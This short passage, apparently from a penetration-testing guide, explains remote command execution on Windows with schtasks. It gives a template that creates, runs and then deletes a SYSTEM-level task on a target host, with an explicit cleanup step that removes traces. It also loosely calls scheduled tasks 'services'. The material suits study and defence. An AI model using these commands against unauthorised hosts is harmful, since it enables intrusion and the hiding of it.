IMPORTANT
By default, UAC restricts remote schtasks calls to domain admins and the default local “Administrator” account. Local Windows admins cannot call this service remotely without first disabling UAC!
The schtasks command can also be used to create and manipulate services on remote machines. This uses the Windows RPC (TCP 135), but will fall back to named pipes over SMB (TCP 445) or NetBIOS (TCP 139). (In fact, this is how schtasks works locally as well; the only difference is that in this case a local named pipe is always used.)
# Create $ATTACKER_TASK on the $TARGET_HOST. Note that /sd
# (start date) and /st (start time) don't matter if we're
# invoking the task manually, as we do next.
#
schtasks /s $TARGET_HOST /RU "SYSTEM" /create `
/tn "$ATTACKER_TASK" /tr "$SOME_COMMAND" /sc ONCE `
/sd 06/25/2023 /st 16:10
# Invoke $ATTACKER_TASK.
#
schtasks /s $TARGET_HOST /run /TN "$ATTACKER_TASK"
# Clean up after yourself.
#
schtasks /S $TARGET_HOST /TN "$ATTACKER_TASK" /DELETE /F